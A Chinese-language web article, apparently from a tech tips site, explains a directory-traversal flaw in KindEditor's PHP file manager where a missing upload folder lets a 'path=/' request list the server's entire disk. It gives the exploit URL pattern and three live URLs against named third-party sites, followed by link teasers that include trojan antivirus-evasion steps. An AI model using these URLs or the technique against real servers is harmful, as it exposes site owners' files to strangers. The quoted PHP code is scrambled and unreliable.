kindeditor使用教程:Kindeditor全盘浏览的漏洞是怎么造成的?
因为例子很少,开始想了下不是他们的漏洞,后面想了下,后面没有检查好用户的正常配置内容导致,还是提下吧。
下载地址:
貌似是最新版本的。
测试语言:PHP
测试漏洞文件:/kindeditor/php/file_manager_json.php
默认配置(第16行):
$root_path = $php_path . '../attached/';
当/attached/文件夹不存在(被删)或者被改名为一个不存在的目录时,如网上的一个例子:
$root_path = $php_path . '../../../upload/';
这个CMS下面的目录根本就没得这个目录,所以就造成了漏洞。
怎么造成了漏洞的呢?我们分析下。
PHP Code复制内容到剪贴板
2);//文件夹是否包含文件 $file_list[$i]['filesize']=0;//文件大小 $file_list[$i]['is_photo']=false;//是否图片 $file_list[$i]['filetype']='';//文件类别,用扩展名判断 }else{ $file_list[$i]['is_dir']=false; $file_list[$i]['has_file']=false; $file_list[$i]['filesize']=filesize($file); $file_list[$i]['dir_path']=''; $file_ext=strtolower(pathinfo($file,PATHINFO_EXTENSION)); $file_list[$i]['is_photo']=in_array($file_ext,$ext_arr); $file_list[$i]['filetype']=$file_ext; } $file_list[$i]['filename']=$filename;//文件名,包含扩展名 $file_list[$i]['datetime']=date('Y-m-dH:i:s',filemtime($file));//文件最后修改时间 $i++; } closedir($handle); } //排序 functioncmp_func($a,$b){ global$order; if($a['is_dir']&&!$b['is_dir']){ return-1; }elseif(!$a['is_dir']&&$b['is_dir']){ return1; }else{ if($order=='size'){ if($a['filesize']>$b['filesize']){ return1; }elseif($a['filesize']<$b['filesize']){ order="='type'){" result="array();" url="" charset="UTF-8');" json="newServices_JSON();" json-="">encode($result);
第三十八行:
$current_path = realpath($root_path) . '/';
当$root_path被realpath以后,不存在的目录会返回空,然后连接后面的'/'
$current_path所以默认就等于'/'
当提交了$_GET['path']以后,而且$_GET['path']要以'/'为结尾(有验证),所以,我们就可以构造浏览全盘目录了。
kingedit/php/file_manager_json.php?path=/ (浏览盘符的根目录)
接着上面给出验证的(互联网找到几个):
先给本地的(attached文件夹被我删了):
互联网找到的:
http://demo.douco.com/admin/include/kindeditor/php/file_manager_json.php?path=home/demodoucokdce4mmohd8okuoc1o/wwwroot/&dir=image
http://route53.com.tw/static/jscripts/kindeditor/php/file_manager_json.php?path=home/onepage/public_html/
http://www.bndvalve.com/Public/kindeditor/php/file_manager_json.php?path=wwwroot/bonade/
修复方案:再验证下绝对路径?
简单谈谈哪些类型的网络管理员具有不安全因素?
Jeff Dray最近经过对IT行业的深入调查研究,通过总结和分析针对IT行业列出了一份类别名单。在这里,他定义了七类最不安全的网络管理员。如果你是一名网络管理员,并且已经意识到工作中还存在着不足,看看你属于
详情2018-01-15 16:49:50责编:llp 来源:驱动管家验证码的生成原理及其破解方法
所谓验证码,就是将一串随机产生的数字或符号,生成一幅图片,图片里加上一些干扰象素(防止OCR),由用户肉眼识别其中的验证码信息, 输入表单提交网站验证,验证成功后才能使用某项功能。不少网站为了防止用户
详情2018-01-16 16:39:17责编:llp 来源:驱动管家这里有暴力破解php mysql密码的步骤
传到WebShell上去暴力破解本机的MySql数据库Root或其它用户的密码,因为是破解本机,所以速度奇快无比,貌似还有点效果,这个以前有人发过,这个是我改过的。已知有一处Bug,不清楚为何,密码数量少的时候,准确
详情2018-01-14 21:18:45责编:llp 来源:驱动管家内网安全管理 应对企业内网安全挑战的10种策略
几乎所有企业对于网络安全的重视程度一下子提高了,纷纷采购防火墙等设备希望堵住来自Internet的不安全因素。然而,Intranet内部的攻击和入侵却依然猖狂。事实证明,公司内部的不安全因素远比外部的危害更恐怖。
详情2018-01-19 17:54:32责编:llp 来源:驱动管家adobe flash player swf文件被修改出现漏洞怎么办?
受影响系统: Adobe Flash Player < 9 0 115 0 不受影响系统: Adobe Flash Player 9 0 124 0 描述: Flash Player是一款非常流行的FLASH播放器。 Flash player在试图访问没有正确实例化的嵌入Actionscript对象时存在堆溢出漏洞,如果攻击者恶意
详情2018-01-13 19:26:46责编:llp 来源:驱动管家密码忘了怎么办?常见的计算机网络密码破解方法介绍
我们知道,为了有效维护用户的使用权,进入电脑、上Internet、保护文档等,都要用到不同的账号或密码口令,可以说这些密码就是使用电脑的“通行证”。如果万一忘记或弄混了哪个密码,机器是不认人的,没准儿会误
详情2018-01-17 17:31:14责编:llp 来源:驱动管家木马免杀有哪些绝招?木马免杀的五大绝招
常用的木马免杀方法绝招一:快速搞定瑞星文件查杀操作步骤: 第一步:用OD载入,来到程序的入口点。 第二步:把入口点的第一句PUSH EBP 改成POP EBP 然后保存就可以躲过瑞 星的表面查杀。绝招二:快速定位
详情2018-01-07 09:11:57责编:llp 来源:驱动管家mcafee企业版阻止入侵者创建删除用户和修改密码?
利用McAfee策略让入侵者无法创建用户+无法删除用户+无法改密码的设置方法,强烈建议win2003使用mcafee杀毒软件,其它的都不如这个好。让入侵者无法创建用户+无法删除用户+无法改密码1、打开控制台-访问保护-用户
详情2018-01-20 14:46:49责编:llp 来源:驱动管家谈谈csrf的攻击原理 什么是csrf?
CSRF攻击原理解析Author: rayh4c [80sec]EMail: rayh4c 80sec comSite: http: www 80sec comDate: 2008-9-210×00 前言在Web程序中普通用户一般只在Web界面里完成他想要的操作,Web程序接受的正常客户端请
详情2018-01-18 13:30:58责编:llp 来源:驱动管家电脑文件夹加密怎么做?硬件文件夹加密好还是软件文件夹加密好?
现在,在公司上班族中,由于每天都会形成很多工作文件,一些文件还涉及到单位的无形资产和商业机密,如何保护这些文件的安全就成为当前企业网络管理的重要方面。而对于电脑文件加密,则通常有两种方法:软件加密
详情2018-01-07 08:28:05责编:llp 来源:驱动管家
- kaspersky lab只用ssl加密不安全,远程暴力破解很简单!
- 为什么qq旋风离线下载会失败?qq旋风离线下载失败怎么解决?
- 怎样在win7系统里添加虚拟打印机?虚拟打印机怎么使用?
- 处理打印机打印故障只要遵守这五个原则基本就可以了
- 北桥芯片和南桥芯片相比之间有哪些区别
- win10解决鼠标右键失灵的方法介绍
- 两个办法帮你解决操作系统资源不足的问题
- iphone5使用技巧 如何解决iphone5定位不准的问题?
- 提示无法识别的usb设备?这种情况出现在三星i9300手机上怎么办?
- word进入安全模式了怎么办?word安全模式怎么解除?
- 使用电信宽带要怎么设置路由器?电信宽带设置路由器方法
- 局域网共享的安全防范技巧 保证局域网共享安全有哪些方法?
- 防病毒技术 电脑怎么设置才能防止病毒捆绑常用程序?
- 暴风影音在哪儿导入字幕?暴风影音播放器可以自己添加字幕吗?
- 微软小冰怎么领养?微软小冰领养办法是什么?
- 台式电脑怎么用wifi?台式电脑连接wifi的技巧
- 笔记本电脑怎么设置wifi热点共享?
- global.asa木马怎么清理?为什么会出现global.asa木马?
- word文档里面的撤销快捷键这样用更方便
- 电脑在解压压缩文件的时候解压不了怎么办